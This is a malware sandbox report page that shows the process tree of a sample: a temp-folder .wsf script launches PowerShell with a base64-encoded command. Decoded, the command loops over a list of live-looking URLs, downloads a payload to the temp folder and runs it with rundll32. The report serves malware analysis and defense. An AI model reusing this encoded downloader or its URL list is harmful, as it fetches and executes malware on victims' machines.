popup
| ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Behavioral Analysis

Process tree

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Ffjcx.wsf

    2064

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgA7ACQAUgBlAHcAYQByAGQAZQByACAAPQAgACgAIgBoAHQAdABwAHMAOgAvAC8AbABlAHMAZABlAGwAaQBjAGUAcwBkAGUAeQBhAG4AbgBpAGMAawAuAGMAbwBtAC8ARQBtAEYALwBmADcANgA0AHgAYwBMAGgAYgBHAGMALABoAHQAdABwAHMAOgAvAC8AaQBuAHQAZQByAG4AYQB0AGkAbwBuAGEAbAB2AG8AYwBhAGwAYwBvAGEAYwBoAC4AYwBvAG0ALwAzAHEAQQBaAHcALwBPAFcAWgA1ADgAUQBhAE0AcABMACwAaAB0AHQAcABzADoALwAvAG0AeQBhAG4AbQBhAHIAZwBvAGwAZgBmAGUAZABlAHIAYQB0AGkAbwBuAC4AbwByAGcALwBHADIAMgAvAGIAbQB3AGMAcwA3AE4AcgBMAFkALABoAHQAdABwAHMAOgAvAC8AZwBlAHQAYgB1AHQAdABuAC4AYwBvAG0ALwBNAEQAaAAvAFoAVABRAEgASwAzAEwATQAxAGkAbAAsAGgAdAB0AHAAcwA6AC8ALwB0AGUAbABlAGcAdQBpAGEAbgBkAG8ALgBjAG8AbQAvAGcASABaAG8ANAAvAGsARwBKAFUAbABBACwAaAB0AHQAcABzADoALwAvAGMAaABhAG4AYwBlAHIAeQBsAGEAdwAuAG4AZQB0AC8ASgBnAHoASgBYAC8AZAB0AEgAUQBCAFkALABoAHQAdABwAHMAOgAvAC8AZQBzAHQAdQBkAGkAbwB2AGkAYwB0AG8AcgBwAGEAYwBoAGUAYwBvAC4AYwBvAG0ALwBaAGsAVwBrAGwALwAwAFgANwBIAGwANgA3AE8ALABoAHQAdABwAHMAOgAvAC8AZwBvAGwAZABlAG4AbQBvAHYAaQBlAHMAYQB3AGEAcgBkAHMALgBjAG8AbQAvAGsATQB4AC8AMABSADkAQQB3AHIAUQBMAG0ALABoAHQAdABwAHMAOgAvAC8AaQBuAGcAZQBuAGkAZQByAGkAYQBjAGEAbQBwAG8AcgBpAGUAZwBvAC4AYwBvAG0ALwBaAGEATwAvAG8AawB0AE4AbQBtAEoAZQBDAGEAcwBqACwAaAB0AHQAcABzADoALwAvAGgAYQB6AG8AbgBjAGgAdQByAGMAaAAuAG8AcgBnAC8AYQB6ADQALwBOAGYAaABPAGcAaQA4ACwAaAB0AHQAcABzADoALwAvAGYAbwByAHQAdQBuAGUALgB0AHIAYQB2AGUAbAAvADQAZABBAGUALwB0AGQAUgBaAEQARwB2AEkALABoAHQAdABwAHMAOgAvAC8AYQBuAGQAcgBvAGkAZABwAG8AcwBtAGUALgBjAG8AbQAvAG8AUgA2AEIANQBIADEALwBCADkASQAwAE8ALABoAHQAdABwAHMAOgAvAC8AcgBpAGQAZQAxAGEAdAB2AC4AYwBvAG0ALwBJADgAUwBUAFcAcQAvAFMAWQBmADMAcABOAGQAIgApAC4AcwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAZgBsAG8AYwBjAHUAbABhAHQAaQBuAGcARABlAGwAaQBjAGkAYQBlACAAaQBuACAAJABSAGUAdwBhAHIAZABlAHIAKQAgAHsAdAByAHkAIAB7AHcAZwBlAHQAIAAkAGYAbABvAGMAYwB1AGwAYQB0AGkAbgBnAEQAZQBsAGkAYwBpAGEAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwAgADEANQAgAC0ATwAgACQAZQBuAHYAOgBUAEUATQBQAFwATABvAHUAbgBnAGUAcgAuAFQAYQBsAHAAaQBmAHkAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAAJABlAG4AdgA6AFQARQBNAFAAXABMAG8AdQBuAGcAZQByAC4AVABhAGwAcABpAGYAeQApAC4AbABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMAAwADAAMAAwACkAIAB7AHMAdABhAHIAdAAgAHIAdQBuAGQAbABsADMAMgAgACQAZQBuAHYAOgBUAEUATQBQAFwAXABMAG8AdQBuAGcAZQByAC4AVABhAGwAcABpAGYAeQAsAE4AaQBrAG4AOwBiAHIAZQBhAGsAOwB9AH0AYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="

      2168

Process contents

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID
default registry file network process services synchronisation iexplore office pdf